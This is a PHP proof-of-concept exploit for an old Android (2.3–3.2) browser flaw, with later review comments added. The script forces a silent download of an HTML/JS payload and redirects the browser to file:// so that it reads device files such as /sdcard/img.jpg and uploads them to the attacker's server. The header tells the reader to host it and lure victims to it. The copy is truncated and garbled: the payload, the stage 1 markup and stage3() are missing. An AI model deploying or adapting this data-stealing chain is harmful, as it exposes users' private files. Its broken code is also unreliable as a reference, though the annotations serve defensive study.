=4.0 did not allow redirecting to file:// by sending a header in testing
 * Author: Thomas Cannon
 * Advisory: (For vulns 1 & 2) : http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/
 * http://www.exploit-db.com/exploits/18164/
 * (For vuln 3, and more on 1 & 2) : http://www.80vul.com/android/android-0days.txt
 *
 * Filename: poc2.php
 * Instructions: Specify files you want to upload in filenames array. Host this php file
 * on a server and visit it using the Android Browser. Some builds of Android
 * may require adjustments to the script, e.g. because payload downloads as .htm instead of .html
 *
 * Tested on: Android 2.3 & Android 3.2 (Emulators)
 */
// NOTE(review): this excerpt begins part-way through the file header; the opening "<?php",
// the "/*" of the header comment and the text preceding "=4.0" are outside this view.
// The header's own finding is the relevant mitigation: the cross-scheme redirect to file://
// that the script relies on was no longer honoured by the platform at Android >= 4.0, so the
// script documents a historical (vendor-fixed) browser weakness rather than a current one.

// List of the files on the device that we want to upload to our server
// Risk note: these paths are read on the victim device by the downloaded payload (see the
// Stage 2 comment below), so every entry here is data that leaves the device.
$filenames = array("/proc/version", "/sdcard/img.jpg");

// Determine the full URL of this script
// NOTE(review): $_SERVER["HTTPS"] is not set at all on a plain-HTTP request, so this line raises
// an undefined-index notice there, and the comparison is loose (==); a strict check such as
// isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" is the conventional form.
$protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http";
// NOTE(review): HTTP_HOST is taken from the request's Host header, i.e. client-supplied input;
// for a self-hosted PoC that is harmless, but in any reusable code the host should come from
// server configuration, not from the request.
$scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];

// Stage 0: Display introduction text and a link to start the PoC.
// NOTE(review): the echoed text appears to have lost its HTML markup in this rendering;
// the original presumably wrapped "Malicious Link" in an anchor to stage=1 — cannot be
// confirmed from this copy. The string below is reproduced exactly as found.
function stage0($scripturl) { echo "Android <= 3.2
Data Stealing Web Page

Click: Malicious Link"; }

// Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect
// to the payload. We load the payload by using an iframe to allow the browser to jump protocols from http:// to file://
// The JavaScript in the payload is then executed in the context of the local device.
// NOTE(review): the function body in this copy is an empty echo; the redirect/iframe markup the
// comment above describes is not present here (most likely stripped as HTML during extraction).
function stage1($scripturl) { echo ""; }

// Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability.
// The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3).
// The response headers below force the browser to treat the response as a file download named
// poc.html; per the header comment, some builds save it as .htm instead, which breaks the later
// file:// load. The defensive property that matters here is the missing download prompt: a
// browser that asks before saving, or refuses to open a just-downloaded file via file://,
// breaks this chain.
// NOTE(review): everything after the "?>" below — the HTML/JS payload, the closing "<?php",
// and the definition of stage3() — is missing from this copy. The trailing fragment
// ' files.txt!"; }' looks like the tail of stage3()'s echo statement, not part of stage2();
// stage3() is referenced by the dispatcher at the bottom but is undefined in what is visible.
function stage2($scripturl,$filenames) {
    header("Cache-Control: public");
    header("Content-Description: File Transfer");
    header("Content-Disposition: attachment; filename=poc.html");
    header("Content-Type: text/html");
    header("Content-Transfer-Encoding: binary");
?> files.txt!"; }

// Cross protocol: Allow the browser to jump from http:// to file://.
// This single Location header is the scheme-jump the whole PoC depends on. The header comment
// at the top records that Android >= 4.0 no longer followed such a redirect in testing, which
// is the platform-side mitigation for this class of issue (refusing http(s) -> file:// redirects).
function crossProtocol() { header("Location:file:///"); }

// Select the stage to run depending on the parameter passed in the URL
// NOTE(review): $_GET["stage"] is read without an isset/?? guard, so a request with no
// "stage" parameter raises an undefined-index notice before falling through to default.
// switch compares with == ; in modern PHP a match() on $_GET["stage"] ?? "" would give strict
// comparison and a single expression. The "3" case calls stage3(), which is not defined in
// this copy of the file (see the Stage 2 note).
switch($_GET["stage"]) {
    case "1": stage1($scripturl); break;
    case "2": stage2($scripturl,$filenames); break;
    case "3": stage3(); break;
    case "cross-protocol": crossProtocol(); break;
    default: stage0($scripturl); break;
}
?>